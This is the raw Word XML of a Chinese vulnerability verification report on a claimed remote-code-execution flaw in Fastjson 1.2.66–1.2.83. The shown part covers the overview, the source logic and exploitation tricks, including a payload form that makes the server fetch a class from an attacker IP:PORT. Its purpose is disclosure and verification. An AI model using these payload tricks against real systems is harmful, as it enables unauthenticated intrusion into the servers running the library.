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742FF" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00834902">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72422A2B" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00834902">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F58A56F" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Fastjson 1.2.83</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:br/>
        <w:t>GetResource RCE 漏洞验证报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CF903B" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00834902">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53DCF97B" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="595959"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>@JSONType 资源探测远程代码执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="595959"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>(Gadget-Free · AutoType 默认关闭仍可触发)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5BB98D" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00834902">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CEA3634" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00834902">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="202E5CE2" w14:textId="3C0499FF" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>报告日期：2026年07月21日</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t>版本：V1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAE0479" w14:textId="77777777" w:rsidR="00834902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07EE5C8B" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>目  录</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5E60F804" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>一、漏洞概述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4917A225" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>二、漏洞原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB4467A" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>三、验证环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61007269" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>四、验证步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693219E8" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>五、Payload 对照表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4218CB79" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>六、安全风险分级</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C42B3E7" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>七、修复建议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FC81AE" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>八、验证流程总结</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3307C51B" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>九、验证截图</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Checklist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C216EEE" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A97D4C" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>一、漏洞概述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834902" w14:paraId="4B6C4F37" w14:textId="77777777" w:rsidTr="008349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638A879" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36A3F7F5" w14:textId="77777777" w:rsidR="0083490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内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="21FD8FF2" w14:textId="77777777" w:rsidTr="008349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527C953" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>漏洞名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32632E8C" w14:textId="77777777" w:rsidR="0083490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Fastjson @JSONType 资源探测 RCE（Gadget-Free）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="30E3B74B" w14:textId="77777777" w:rsidTr="0083490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787FDA6" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>影响版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="571A8EC3" w14:textId="77777777" w:rsidR="0083490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Fastjson 1.2.66 – 1.2.83</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="58F28E89" w14:textId="77777777" w:rsidTr="008349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AFB73AA" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>漏洞类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B911C2D" w14:textId="77777777" w:rsidR="0083490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远程代码执行（RCE）/ 不</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>安全反序列化</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> / 远程 Class 注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="76503F6E" w14:textId="77777777" w:rsidTr="0083490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C5313B4" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>利用条件</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A27DCD9" w14:textId="77777777" w:rsidR="0083490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Spring Boot fat-jar 启动（LaunchedURLClassLoader）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="0D22129F" w14:textId="77777777" w:rsidTr="008349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F9E4D8D" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>AutoType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77121E51" w14:textId="77777777" w:rsidR="0083490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false（默认）即可触发</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="251C361E" w14:textId="77777777" w:rsidTr="0083490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F3127B7" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>SafeMode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BCD7C09" w14:textId="77777777" w:rsidR="0083490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需未开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="6956BED0" w14:textId="77777777" w:rsidTr="008349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654F65D" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>JDK 影响</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="447C22FB" w14:textId="77777777" w:rsidR="0083490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JDK 8/11/17/21/25 均可触发 HTTP 回调（SSRF）；JDK 8 可直接 RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="26ADDF72" w14:textId="77777777" w:rsidTr="0083490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FE32447" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>攻击向量</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07F39528" w14:textId="77777777" w:rsidR="0083490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网络远程，无需认证，无需用户交互</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="0A8DEC60" w14:textId="77777777" w:rsidTr="008349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761EFED" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>危害等级</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="033E5D4C" w14:textId="77777777" w:rsidR="0083490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高危 / 严重（满足条件时）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="01B1E876" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00834902">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="212FA936" w14:textId="77777777" w:rsidR="00834902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本漏洞并非传统"绕过黑名单后寻找本地 Gadget"的利用方式，而是将 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Fastjson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 自身的 Class 元数据探测逻辑（检查 @JSONType 注解）直接扭转为远程恶意 Class 的获取与授权通道。攻击者在 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>AutoType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 默认关闭的状态下，仅通过一个 JSON 请求即可让目标服务器发起 HTTP 请求，在 JDK 8 + Spring Boot Loader 环境下可完成完整的远程代码执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7B4999" w14:textId="77777777" w:rsidR="00834902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二、漏洞原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C35962" w14:textId="77777777" w:rsidR="00834902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2.1 核心链路</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4148E688" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Fastjson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 在 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ParserConfig.checkAutoType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>中，会将用户可控的</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> @type 值转换为 Class 资源名并交给当前 ClassLoader 的 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>getResourceAsStream(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>) 方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C0D8C2" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>源码位置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: ParserConfig.java:1479-1498</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>String resource = typeName.replace('.', '/') + ".class";</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>is = ParserConfig.class.getClassLoader().getResourceAsStream(resource);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>如果字节码中包含</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> @JSONType </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>注解，则直接信任该类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>跳过危险基类检查和目标类型相容性检查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>if (jsonType) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    return clazz;  // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>早返回，绕过所有安全检查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15484CCB" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00834902">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11B6B1B6" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t>2.2 利用技巧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67"/>
        <w:gridCol w:w="2870"/>
        <w:gridCol w:w="3119"/>
      </w:tblGrid>
      <w:tr w:rsidR="00834902" w14:paraId="2DAC3F5F" w14:textId="77777777" w:rsidTr="008349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8CC3BCE" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>技巧</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E1F1984" w14:textId="77777777" w:rsidR="0083490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说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A22A1F6" w14:textId="77777777" w:rsidR="0083490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示例</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="27A99AF3" w14:textId="77777777" w:rsidTr="008349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407F3A8" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>点号替换</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="001B4D33" w14:textId="77777777" w:rsidR="0083490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@type 中 . 会被替换为 /，可利用 .. 构造绝对 URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="326D56D9" w14:textId="77777777" w:rsidR="0083490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gramStart"/>
            <w:r>
              <w:t>http:..IP:PORT.TOKEN</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> → http://IP:PORT/TOKEN.class</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="2C1F3891" w14:textId="77777777" w:rsidTr="0083490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AA3585" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>整数 IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CD3EF9C" w14:textId="77777777" w:rsidR="0083490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IP 用整数形式可避免点号被替换拆散</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="399BE14E" w14:textId="77777777" w:rsidR="0083490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127.0.0.1 → 2130706433</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="631C787B" w14:textId="77777777" w:rsidTr="008349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4C9D43D" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>@JSONType 注解</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DDFFF88" w14:textId="77777777" w:rsidR="0083490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远程 class 携带 @JSONType 后，</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>危险基类</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>检查被跳过</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="655AAFF0" w14:textId="77777777" w:rsidR="0083490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t>直接</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>loadClass</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> → </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>defineClass</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> → &lt;clinit&gt; 执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="34A67539" w14:textId="77777777" w:rsidTr="0083490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646EEE8" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Exception 后缀</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A482D85" w14:textId="77777777" w:rsidR="0083490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类型名以 Exception 结尾时 Fastjson 返回 null 而非抛异常</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
